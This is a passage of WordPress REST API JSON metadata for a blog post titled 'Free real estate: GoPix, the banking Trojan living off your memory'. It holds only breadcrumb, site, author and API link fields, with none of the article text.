tem","position":1,"name":"Home","item":"https:\/\/blog.ibvl.in\/"},{"@type":"ListItem","position":2,"name":"Free real estate: GoPix, the banking Trojan living off your memory"}]},{"@type":"WebSite","@id":"https:\/\/blog.ibvl.in\/#website","url":"https:\/\/blog.ibvl.in\/","name":"Imperative Business Ventures Limited","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/blog.ibvl.in\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","caption":"admin"},"sameAs":["https:\/\/blog.ibvl.in"],"url":"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/"}]}},"_links":{"self":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/1930","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/comments?post=1930"}],"version-history":[{"count":0,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/1930\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/media?parent=1930"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/categories?post=1930"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/tags?post=1930"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}